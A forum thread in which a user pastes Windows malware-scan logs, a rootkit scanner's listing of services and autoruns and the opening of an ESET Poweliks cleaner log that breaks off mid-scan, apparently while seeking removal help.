16:00:14.0118 0x42d8 [ 2F816382F8F0D1EA7125E14467788FA2, E5397C0CA572DCBD9156F889AD9E790EBC22CE18DF3653340A93772A3A3925D4 ] C:\Program Files (x86)\VIZIO\VIZIO_FN_Key_Utility\XVx.exe
16:00:14.0368 0x42d8 OSD Utility - detected UnsignedFile.Multi.Generic ( 1 )
16:00:18.0049 0x42d8 OSD Utility ( UnsignedFile.Multi.Generic ) - warning
16:00:21.0419 0x42d8 [ 15D6EFED817CE145FF05A9829050D547, 8ABE7E22C146F2EEE3F3F3713C92BC1D6734477E488872D22ABE2188D2077A39 ] C:\Program Files (x86)\Garmin\ANT Agent\ANT Agent.exe
16:00:21.0809 0x42d8 ANT Agent - detected UnsignedFile.Multi.Generic ( 1 )
16:00:24.0617 0x42d8 Detect skipped due to KSN trusted
16:00:24.0617 0x42d8 ANT Agent - ok
16:00:24.0773 0x42d8 Waiting for KSN requests completion. In queue: 6
16:00:25.0787 0x42d8 Waiting for KSN requests completion. In queue: 6
16:00:26.0801 0x42d8 Waiting for KSN requests completion. In queue: 1
16:00:27.0831 0x42d8 AV detected via SS2: Microsoft Security Essentials, C:\Program Files\Microsoft Security Client\msseces.exe ( 4.6.305.0 ), 0x61000 ( enabled : updated )
16:00:27.0862 0x42d8 Win FW state via NFP2: enabled
16:00:30.0389 0x42d8 ============================================================
16:00:30.0389 0x42d8 Scan finished
16:00:30.0389 0x42d8 ============================================================
16:00:30.0389 0x4298 Detected object count: 1
16:00:30.0389 0x4298 Actual detected object count: 1
16:00:59.0062 0x4298 OSD Utility ( UnsignedFile.Multi.Generic ) - skipped by user
16:00:59.0062 0x4298 OSD Utility ( UnsignedFile.Multi.Generic ) - User select action: Skip
16:01:48.0436 0x4af4 ============================================================
16:01:48.0436 0x4af4 Scan started
16:01:48.0436 0x4af4 Mode: Manual; SigCheck; TDLFS;
16:01:48.0436 0x4af4 ============================================================
16:01:48.0436 0x4af4 KSN ping started
16:01:50.0963 0x4af4 KSN ping finished: true
16:01:51.0353 0x4af4 ================ Scan system memory ========================
16:01:51.0353 0x4af4 System memory - ok
16:01:51.0353 0x4af4 ================ Scan services =============================
16:01:53.0085 0x4af4 [ 379A6AB7F2AD8FC61B1306767083D705, 7B484048EC2A66EA09D4B5B9312C517A9C3618C7A5B952E863DF31DE9EA38603 ] AtherosSvc C:\Program Files (x86)\Bluetooth Suite\adminservice.exe
16:01:53.0100 0x4af4 AtherosSvc - detected UnsignedFile.Multi.Generic ( 1 )
16:01:53.0100 0x4af4 Detect skipped due to KSN trusted
16:01:53.0100 0x4af4 AtherosSvc - ok
ascot1340
2014-11-07, 23:37
16:02:02.0211 0x4af4 [ B1EF4686961986DFFB7FE8F18E6FCB5B, 562F144DAA8C2D6E4D55C7ABEF1DB52FC67F1A09E03CD700E27DFC3A4920E271 ] nlsX86cc C:\Windows\SysWOW64\nlssrv32.exe
16:02:02.0226 0x4af4 nlsX86cc - detected UnsignedFile.Multi.Generic ( 1 )
16:02:02.0226 0x4af4 Detect skipped due to KSN trusted
16:02:02.0226 0x4af4 nlsX86cc - ok
16:02:09.0730 0x4af4 vwififlt - ok
16:02:09.0746 0x4af4 [ 1C9D80CC3849B3788048078C26486E1A, 34A89F31E53F6B6C209B286F580CC2257AE6D057E4E20741F241C9C167947962 ] W32Time C:\Windows\system32\w32time.dll
16:02:09.0777 0x4af4 W32Time - ok
16:02:09.0792 0x4af4 [ 4E9440F4F152A7B944CB1663D3935A3E, 8FE04EBD3BC612EE943A21A3E56F37E5C9B578CDACA6044048181DAD81816D53 ] WacomPen C:\Windows\system32\drivers\wacompen.sys
16:02:09.0808 0x4af4 WacomPen - ok
16:02:09.0824 0x4af4 [ 356AFD78A6ED4457169241AC3965230C, CE4D1EE3525C10AC658B20776C3E444DE44874C837713DC5311386EDFCB18399 ] WANARP C:\Windows\system32\DRIVERS\wanarp.sys
16:02:09.0839 0x4af4 WANARP - ok
16:02:09.0839 0x4af4 [ 356AFD78A6ED4457169241AC3965230C, CE4D1EE3525C10AC658B20776C3E444DE44874C837713DC5311386EDFCB18399 ] Wanarpv6 C:\Windows\system32\DRIVERS\wanarp.sys
16:02:09.0870 0x4af4 Wanarpv6 - ok
16:02:09.0917 0x4af4 [ 3CEC96DE223E49EAAE3651FCF8FAEA6C, 4150DAB33E8D61076F1D4767BCAFC9B4ECCCCBD58FD4FB3CFE5B8D27DCDCAB61 ] WatAdminSvc C:\Windows\system32\Wat\WatAdminSvc.exe
16:02:09.0933 0x4af4 WatAdminSvc - ok
16:02:10.0011 0x4af4 [ 78F4E7F5C56CB9716238EB57DA4B6A75, 46A4E78CE5F2A4B26F4E9C3FF04A99D9B727A82AC2E390A82A1611C3F6E0C9AF ] wbengine C:\Windows\system32\wbengine.exe
16:02:10.0042 0x4af4 wbengine - ok
16:02:10.0058 0x4af4 [ 3AA101E8EDAB2DB4131333F4325C76A3, 4F7BD3DA5E58B18BFF106CFF7B45E75FD13EE556D433C695BA23EC80827E49DE ] WbioSrvc C:\Windows\System32\wbiosrvc.dll
16:02:10.0073 0x4af4 WbioSrvc - ok
16:02:10.0089 0x4af4 [ 7368A2AFD46E5A4481D1DE9D14848EDD, 8039C478FC2D9F095F5883A4FA47F9E6EDF57CC88A4AA74F07C88445F90DED57 ] wcncsvc C:\Windows\System32\wcncsvc.dll
16:02:10.0104 0x4af4 wcncsvc - ok
16:02:10.0120 0x4af4 [ 20F7441334B18CEE52027661DF4A6129, 7B8E0247234B740FED2BE9B833E9CE8DD7453340123AB43F6B495A7E6A27B0DD ] WcsPlugInService C:\Windows\System32\WcsPlugInService.dll
16:02:10.0120 0x4af4 WcsPlugInService - ok
16:02:10.0151 0x4af4 [ 72889E16FF12BA0F235467D6091B17DC, F2FD0BBD075E33608D93F350D216F97442AB89ABD540513C2D568C78096E12A8 ] Wd C:\Windows\system32\drivers\wd.sys
16:02:10.0167 0x4af4 Wd - ok
16:02:10.0182 0x4af4 [ A3D04EBF5227886029B4532F20D026F7, D90F7B9C176008675DA0B5FD7E4973CBC2A04172CEDF8FB7D3B3B4F27B5440D7 ] WDC_SAM C:\Windows\system32\DRIVERS\wdcsam64.sys
16:02:10.0198 0x4af4 WDC_SAM - ok
16:02:10.0260 0x4af4 [ E2C933EDBC389386EBE6D2BA953F43D8, AF1DEADD5F1267CCEBD226E8EEB971D1946EA6A5A9645A36F5D111F758AF2F07 ] Wdf01000 C:\Windows\system32\drivers\Wdf01000.sys
16:02:10.0292 0x4af4 Wdf01000 - ok
16:02:10.0292 0x4af4 [ BF1FC3F79B863C914687A737C2F3D681, B2DF47AC4931ACFB243775767B77065CC0D98778FC0243C793A3E219EB961209 ] WdiServiceHost C:\Windows\system32\wdi.dll
16:02:10.0307 0x4af4 WdiServiceHost - ok
16:02:10.0307 0x4af4 [ BF1FC3F79B863C914687A737C2F3D681, B2DF47AC4931ACFB243775767B77065CC0D98778FC0243C793A3E219EB961209 ] WdiSystemHost C:\Windows\system32\wdi.dll
16:02:10.0323 0x4af4 WdiSystemHost - ok
16:02:10.0354 0x4af4 [ 0EB0E5D22B1760F2DBCE632F2DD7A54D, B8A4CC62F88768947FB0A161CF9564DB28FD9C1C037B5475DF192982DE035C22 ] WebClient C:\Windows\System32\webclnt.dll
16:02:10.0370 0x4af4 WebClient - ok
16:02:10.0385 0x4af4 [ C749025A679C5103E575E3B48E092C43, B71171D07EE7AB085A24BF3A1072FF2CE7EA021AAE695F6A90640E6EE8EB55C1 ] Wecsvc C:\Windows\system32\wecsvc.dll
16:02:10.0416 0x4af4 Wecsvc - ok
16:02:10.0432 0x4af4 [ 7E591867422DC788B9E5BD337A669A08, 484E6BCCDF7ADCE9A1AACAD1BC7C7D7694B9E40FA90D94B14D80C607784F6C75 ] wercplsupport C:\Windows\System32\wercplsupport.dll
16:02:10.0448 0x4af4 wercplsupport - ok
16:02:10.0463 0x4af4 [ 6D137963730144698CBD10F202E9F251, A9F522A125158D94F540544CCD4DBF47B9DCE2EA878C33675AFE40F80E8F4979 ] WerSvc C:\Windows\System32\WerSvc.dll
16:02:10.0494 0x4af4 WerSvc - ok
16:02:10.0494 0x4af4 [ 611B23304BF067451A9FDEE01FBDD725, 0AF2734B978165FC6FD22B64862132CCE32528A21C698A49D176129446E099C8 ] WfpLwf C:\Windows\system32\DRIVERS\wfplwf.sys
16:02:10.0526 0x4af4 WfpLwf - ok
16:02:10.0541 0x4af4 [ 05ECAEC3E4529A7153B3136CEB49F0EC, 9995CB2CEC70A633EA33CBB0DEAD2BB28CB67132B41E9444BDAB9E75744C9A50 ] WIMMount C:\Windows\system32\drivers\wimmount.sys
16:02:10.0541 0x4af4 WIMMount - ok
16:02:10.0557 0x4af4 WinDefend - ok
16:02:10.0557 0x4af4 WinHttpAutoProxySvc - ok
16:02:10.0619 0x4af4 [ 19B07E7E8915D701225DA41CB3877306, D6555E8D276DBB11358246E0FE215F76F1FB358791C76B88D82C2A66A42DA19F ] Winmgmt C:\Windows\system32\wbem\WMIsvc.dll
16:02:10.0666 0x4af4 Winmgmt - ok
16:02:10.0744 0x4af4 [ BCB1310604AA415C4508708975B3931E, 9D943F086D454345153A0DD426B4432532A44FD87950386B186E1CAD2AC70565 ] WinRM C:\Windows\system32\WsmSvc.dll
16:02:10.0806 0x4af4 WinRM - ok
16:02:10.0838 0x4af4 [ FE88B288356E7B47B74B13372ADD906D, A16B166F6BB32EF9D2A142F27B9EC54CBC7B3AC915799783CF4C40E525BC9E03 ] WinUsb C:\Windows\system32\DRIVERS\WinUsb.sys
16:02:10.0838 0x4af4 WinUsb - ok
16:02:10.0869 0x4af4 [ 4FADA86E62F18A1B2F42BA18AE24E6AA, CE1683386886BF34862681A46199EA7E7FB4232A186047DA7FBD8EC240AF6726 ] Wlansvc C:\Windows\System32\wlansvc.dll
16:02:10.0900 0x4af4 Wlansvc - ok
16:02:10.0947 0x4af4 [ 06C8FA1CF39DE6A735B54D906BA791C6, D8FEC7DE227781CDA876904701B2AA995268F74DCD6CB34AA0296C557FC283B6 ] wlcrasvc C:\Program Files\Windows Live\Mesh\wlcrasvc.exe
16:02:10.0962 0x4af4 wlcrasvc - ok
16:02:11.0072 0x4af4 [ 2BACD71123F42CEA603F4E205E1AE337, 1FEF20554110371D738F462ECFFA999158EFEED02062414C58C1B61C422BF0B9 ] wlidsvc C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
16:02:11.0118 0x4af4 wlidsvc - ok
16:02:11.0134 0x4af4 [ F6FF8944478594D0E414D3F048F0D778, 6F75E0AE6127B33A92A88E59D4B048FD4C15F997807BE7BF0EFE76F95235B1D9 ] WmiAcpi C:\Windows\system32\DRIVERS\wmiacpi.sys
16:02:11.0134 0x4af4 WmiAcpi - ok
16:02:11.0165 0x4af4 [ 38B84C94C5A8AF291ADFEA478AE54F93, 1AC267AC73670BEA5F3785C9AD9DB146F8E993A862C843742B21FDB90D102B2A ] wmiApSrv C:\Windows\system32\wbem\WmiApSrv.exe
16:02:11.0181 0x4af4 wmiApSrv - ok
16:02:11.0196 0x4af4 WMPNetworkSvc - ok
16:02:11.0259 0x4af4 [ 58540037A4A3EEEEFA47C84100E1694F, 9BB055D008F1BC55E4361BBDB525CAD2E2E0ED7CFF1AA34A9BA7BEEDEA1A4B08 ] WMZuneComm C:\Program Files\Zune\WMZuneComm.exe
16:02:11.0274 0x4af4 WMZuneComm - ok
16:02:11.0290 0x4af4 [ 96C6E7100D724C69FCF9E7BF590D1DCA, 2E63C9B0893B4FC03B7A71BAEA6202D3D3DB1B52F3643467829B5A573FD7655B ] WPCSvc C:\Windows\System32\wpcsvc.dll
16:02:11.0306 0x4af4 WPCSvc - ok
16:02:11.0306 0x4af4 [ 93221146D4EBBF314C29B23CD6CC391D, C0750858A65BF51E210CD244C825C121D67E025CD2D2455139991AAC289A90FE ] WPDBusEnum C:\Windows\system32\wpdbusenum.dll
16:02:11.0321 0x4af4 WPDBusEnum - ok
16:02:11.0337 0x4af4 [ 6BCC1D7D2FD2453957C5479A32364E52, E48554D31FBDCF8F985C1C72524CAA9106F5B7CC2B79064F8F5E2562D517F090 ] ws2ifsl C:\Windows\system32\drivers\ws2ifsl.sys
16:02:11.0352 0x4af4 ws2ifsl - ok
16:02:11.0368 0x4af4 [ E8B1FE6669397D1772D8196DF0E57A9E, 39FE0819360719F756BD31A1884A0508A1E2371ACC723E25E005CBEC0A7B02FA ] wscsvc C:\Windows\system32\wscsvc.dll
16:02:11.0384 0x4af4 wscsvc - ok
16:02:11.0384 0x4af4 WSearch - ok
16:02:11.0493 0x4af4 [ 61FF576450CCC80564B850BC3FB6713A, B2843BC9E2F62D27DCF6787D063378926748CE75002BADA1873DCB5039883705 ] wuauserv C:\Windows\system32\wuaueng.dll
16:02:11.0540 0x4af4 wuauserv - ok
16:02:11.0555 0x4af4 [ AB886378EEB55C6C75B4F2D14B6C869F, D6C4602EB8F291DADEDF3CD211013D4AC752DDE7E799C2D8D74AA4F5477CAED6 ] WudfPf C:\Windows\system32\drivers\WudfPf.sys
16:02:11.0571 0x4af4 WudfPf - ok
16:02:11.0586 0x4af4 [ DDA4CAF29D8C0A297F886BFE561E6659, 94E5DD649B5D86FA1A7C7D30FCF9644D0EE048D312E626111458ADF66BFBE978 ] WUDFRd C:\Windows\system32\DRIVERS\WUDFRd.sys
16:02:11.0602 0x4af4 WUDFRd - ok
16:02:11.0618 0x4af4 [ B20F051B03A966392364C83F009F7D17, 88ECEB55AE91F58F592B96EBC10B572747D5A2F9B7629E8F371761E4F7408A65 ] wudfsvc C:\Windows\System32\WUDFSvc.dll
16:02:11.0618 0x4af4 wudfsvc - ok
16:02:11.0649 0x4af4 [ 04F82965C09CBDF646B487E145060301, 2CD8533EDBE24C3E42EB7550E20F8A2EB9E5E345B165DEF543163A6BC1FDD18B ] WwanSvc C:\Windows\System32\wwansvc.dll
16:02:11.0664 0x4af4 WwanSvc - ok
16:02:11.0961 0x4af4 [ D6EF205269C2A584AF6B56B9F95010F8, C414FF4805C5FE47E5B9E9694419AE08CBEA26ECEF1F977742B23AFA032CE8E1 ] ZuneNetworkSvc C:\Program Files\Zune\ZuneNss.exe
16:02:12.0086 0x4af4 ZuneNetworkSvc - ok
16:02:12.0132 0x4af4 [ 7A565AFE58F3822A9E622868E5CC0E5C, E09EF57D7739BF09EAF7A20199107D84F1290F9C34B9D3E6446A0215A8BE1990 ] ZuneWlanCfgSvc C:\Program Files\Zune\ZuneWlanCfgSvc.exe
16:02:12.0148 0x4af4 ZuneWlanCfgSvc - ok
16:02:12.0148 0x4af4 ================ Scan global ===============================
16:02:12.0164 0x4af4 [ BA0CD8C393E8C9F83354106093832C7B, 18D8A4780A2BAA6CEF7FBBBDA0EF6BF2DADF146E1E578A618DD5859E8ADBF1A8 ] C:\Windows\system32\basesrv.dll
16:02:12.0195 0x4af4 [ 88EDD0B34EED542745931E581AD21A32, DC2B93E1CEF5B0BCEE08D72669BB0F3AD0E8E6E75BDC08858407ED92F6FFA031 ] C:\Windows\system32\winsrv.dll
16:02:12.0210 0x4af4 [ 88EDD0B34EED542745931E581AD21A32, DC2B93E1CEF5B0BCEE08D72669BB0F3AD0E8E6E75BDC08858407ED92F6FFA031 ] C:\Windows\system32\winsrv.dll
16:02:12.0242 0x4af4 [ D6160F9D869BA3AF0B787F971DB56368, 0033E6212DD8683E4EE611B290931FDB227B4795F0B17C309DC686C696790529 ] C:\Windows\system32\sxssrv.dll
16:02:12.0273 0x4af4 [ 24ACB7E5BE595468E3B9AA488B9B4FCB, 63541E3432FCE953F266AE553E7A394978D6EE3DB52388D885F668CF42C5E7E2 ] C:\Windows\system32\services.exe
16:02:12.0288 0x4af4 [ Global ] - ok
16:02:12.0288 0x4af4 ================ Scan MBR ==================================
16:02:12.0304 0x4af4 [ A36C5E4F47E84449FF07ED3517B43A31 ] \Device\Harddisk0\DR0
16:02:12.0538 0x4af4 \Device\Harddisk0\DR0 - ok
16:02:12.0538 0x4af4 ================ Scan VBR ==================================
16:02:12.0554 0x4af4 [ 2EA9BF8CDE8B71F3CA2C1BC9FEF1EED1 ] \Device\Harddisk0\DR0\Partition1
16:02:12.0569 0x4af4 \Device\Harddisk0\DR0\Partition1 - ok
16:02:12.0585 0x4af4 ================ Scan generic autorun ======================
16:02:12.0803 0x4af4 [ 4058D1C660E32D6E6A2C2B672640EF60, 8F655773C4909365A41358CEF6CB7C399A104ECDAA1B9EAFB26269A8EF413ACA ] C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\FspUip.exe
16:02:12.0897 0x4af4 FspUip - ok
16:02:13.0006 0x4af4 [ 5EE06BCE2FCC6A6224FC146FBDF78B2E, C9A82EFD1DAF9571C29E87096F5BFE1CBFD98F0AB36428FF43DC6E59BEB6823A ] C:\Program Files\SRS Labs\SRS Control Panel\SRSPanel_64.exe
16:02:13.0053 0x4af4 SRS Premium Sound HD - ok
16:02:13.0084 0x4af4 [ 7307AEC9FA7F0872A26F4B5D2E8B623A, 95C9EED87278F638C8DAEDBE0ECB10F8FC725623AB707DD7C36F3A11A361BE52 ] C:\Windows\system32\igfxtray.exe
16:02:13.0084 0x4af4 IgfxTray - ok
16:02:13.0100 0x4af4 [ 053C46FD07C5FB6D4C73FCC7DE72D3D3, D636554AA1C8899C7B85ABE27194F8BFE6002634CE69BCD7127F3081C6E79B81 ] C:\Windows\system32\hkcmd.exe
16:02:13.0115 0x4af4 HotKeysCmds - ok
16:02:13.0131 0x4af4 [ 5ED0DF577AC20A47685DE15D25C077D8, 72B33534D88C0AA944A548489E05C500D1A45FA9818446C7CC9E111DE9C8C1F3 ] C:\Windows\system32\igfxpers.exe
16:02:13.0146 0x4af4 Persistence - ok
16:02:13.0240 0x4af4 [ 048FA2F7B7F5292ABD6FE52D360708AB, CD3E9897D706D2D3E7F4492432BC69182201FAB0E85C58683E82094C7AD5F303 ] C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe
16:02:13.0271 0x4af4 AtherosBtStack - detected UnsignedFile.Multi.Generic ( 1 )
16:02:13.0271 0x4af4 Detect skipped due to KSN trusted
16:02:13.0271 0x4af4 AtherosBtStack - ok
16:02:13.0302 0x4af4 [ F282E6109982A4ABDD925BA3F6EE04AB, 1D8C98549D7A02F9228C3FB122A07F8E87ACE936FEC6FD3B5F517243F330E951 ] C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe
16:02:13.0318 0x4af4 AthBtTray - detected UnsignedFile.Multi.Generic ( 1 )
16:02:13.0318 0x4af4 Detect skipped due to KSN trusted
16:02:13.0318 0x4af4 AthBtTray - ok
16:02:13.0427 0x4af4 [ A6AAD37CDCAE75CB62D039E3A4D8F5E3, 4FF763B0D129175BA1B1E794BA313E6C63F7A89D377C786BF5E730AF2A1D95D1 ] c:\Program Files\Microsoft Security Client\msseces.exe
16:02:13.0458 0x4af4 MSC - ok
16:02:13.0505 0x4af4 [ B1964E8776FD7633F149788F5B2A71CB, E30AC137B9DC2D3456499E0BB3B1955D2E0F7FFDB11E7A290A9DA25C76F4FAF8 ] C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe
16:02:13.0505 0x4af4 CDAServer - ok
16:02:13.0568 0x4af4 [ 4D1DA8CE5E364D22B4FF00F163194514, 165DE474309206A0F51266F19EDB4AF3D7BAD19FDA61B636AEE7A04278DBBC2C ] C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
16:02:13.0599 0x4af4 USB3MON - ok
16:02:13.0817 0x4af4 [ 2F816382F8F0D1EA7125E14467788FA2, E5397C0CA572DCBD9156F889AD9E790EBC22CE18DF3653340A93772A3A3925D4 ] C:\Program Files (x86)\VIZIO\VIZIO_FN_Key_Utility\XVx.exe
16:02:13.0942 0x4af4 OSD Utility - detected UnsignedFile.Multi.Generic ( 1 )
16:02:13.0942 0x4af4 OSD Utility ( UnsignedFile.Multi.Generic ) - warning
16:02:16.0532 0x4af4 [ F4FEC311177C29BF7FF3A1B6002B3B64, A51312B76D0187BF729BE75A3AA404F3EFDA25B33DBC2D2B1B6218ECEC4E8429 ] C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Reader_sl.exe
16:02:16.0547 0x4af4 Adobe Reader Speed Launcher - ok
16:02:16.0610 0x4af4 [ 94A4D6915D4F572309DF6137E1846528, E46BDF83CAA6683AA655DBA3D2C8DC7AC06251E952466A20CFDA3A16B1840455 ] C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe
16:02:16.0625 0x4af4 APSDaemon - ok
16:02:16.0703 0x4af4 [ 47EA5F76FAB723C61AB4A0D79BAD512C, A7A38EB0A7068B160E6949945EF639F999A06AE35746F6E79C7350745798E5C9 ] C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
16:02:16.0734 0x4af4 Adobe ARM - ok
16:02:16.0781 0x4af4 [ 79C28DDF889C26FDD6162F796FD49BC4, C1E2468B4F0F52BD707D16656F33CC438AF8E18A38BB6CFB64D11F23993F72F0 ] C:\Program Files (x86)\iTunes\iTunesHelper.exe
16:02:16.0797 0x4af4 iTunesHelper - ok
16:02:16.0859 0x4af4 [ 14D6542607ACD4B2D1DDB1A36E0D8813, 3A270600549E8E7988D5AF3486C0F504269B9573393D87BF87BDB2287BF007B2 ] C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
16:02:16.0890 0x4af4 SunJavaUpdateSched - ok
16:02:17.0280 0x4af4 [ 15D6EFED817CE145FF05A9829050D547, 8ABE7E22C146F2EEE3F3F3713C92BC1D6734477E488872D22ABE2188D2077A39 ] C:\Program Files (x86)\Garmin\ANT Agent\ANT Agent.exe
16:02:17.0514 0x4af4 ANT Agent - detected UnsignedFile.Multi.Generic ( 1 )
16:02:17.0514 0x4af4 Detect skipped due to KSN trusted
16:02:17.0514 0x4af4 ANT Agent - ok
16:02:17.0624 0x4af4 [ 42170B17D82FF8059BA28C7B7AE8F097, 82E2DD884D75767E09884798925355FF9ACBFE0014A0CAED1EE97159D1FD164A ] C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_15_0_0_167_ActiveX.exe
16:02:17.0639 0x4af4 FlashPlayerUpdate - ok
16:02:17.0655 0x4af4 AV detected via SS2: Microsoft Security Essentials, C:\Program Files\Microsoft Security Client\msseces.exe ( 4.6.305.0 ), 0x61000 ( enabled : updated )
16:02:17.0655 0x4af4 Win FW state via NFP2: enabled
16:02:20.0151 0x4af4 ============================================================
16:02:20.0151 0x4af4 Scan finished
16:02:20.0151 0x4af4 ============================================================
16:02:20.0151 0x4c64 Detected object count: 1
16:02:20.0151 0x4c64 Actual detected object count: 1
16:03:09.0915 0x4c64 OSD Utility ( UnsignedFile.Multi.Generic ) - skipped by user
16:03:09.0915 0x4c64 OSD Utility ( UnsignedFile.Multi.Generic ) - User select action: Skip
ascot1340
2014-11-07, 23:39
[2014.11.07 16:06:32.924] - Begin
[2014.11.07 16:06:32.924] -
[2014.11.07 16:06:32.955] - ....................................
[2014.11.07 16:06:32.955] - ..::::::::::::::::::....................
[2014.11.07 16:06:32.955] - .::EEEEEE:::SSSSSS::..EEEEEE..TTTTTTTT.. Win32/Poweliks
[2014.11.07 16:06:32.955] - .::EE::::EE:SS:::::::.EE....EE....TT...... Version: 1.0.0.1
[2014.11.07 16:06:32.955] - .::EEEEEEEE::SSSSSS::.EEEEEEEE....TT...... Built: Oct 15 2014
[2014.11.07 16:06:32.971] - .::EE:::::::::::::SS:.EE..........TT......
[2014.11.07 16:06:32.971] - .::EEEEEE:::SSSSSS::..EEEEEE.....TT..... Copyright (c) ESET, spol. s r.o.
[2014.11.07 16:06:32.971] - ..::::::::::::::::::.................... 1992-2013. All rights reserved.
[2014.11.07 16:06:32.971] - ....................................
[2014.11.07 16:06:32.971] -
[2014.11.07 16:06:32.971] - --------------------------------------------------------------------------------
[2014.11.07 16:06:32.971] -
[2014.11.07 16:06:32.971] - INFO: OS: 6.1.7601 SP1
[2014.11.07 16:06:32.971] - INFO: Product Type: Workstation
[2014.11.07 16:06:32.971] - INFO: WoW64: True
[2014.11.07 16:06:32.971] - INFO: Machine guid: CB50F163-9B72-4C15-9B76-50D0F196BE8B
[2014.11.07 16:06:32.971] -
[2014.11.07 16:06:35.264] - INFO: Scanning for system infection...
[2014.11.07 16:06:35.264] - --------------------------------------------------------------------------------
[2014.11.07 16:06:35.264] -
[2014.11.07 16:06:35.264] - INFO: Processing [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]...
[2014.11.07 16:06:35.264] - INFO: Processing [HKLM\Software\Microsoft\Windows\CurrentVersion\Run]...
[2014.11.07 16:06:35.264] - INFO: Processing [HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce]...
[2014.11.07 16:06:35.280] - INFO: Processing [HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce]...
[2014.11.07 16:06:35.280] - INFO: Processing classes...
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0001-0004-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0001-0005-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0001-0005-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0001-0006-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0001-0006-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0001-0007-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0001-0007-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0000-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0000-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0001-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0001-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0002-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0002-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0003-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0003-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0004-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0004-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0005-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0005-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0006-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0006-ABCDEFFEDCBB}]
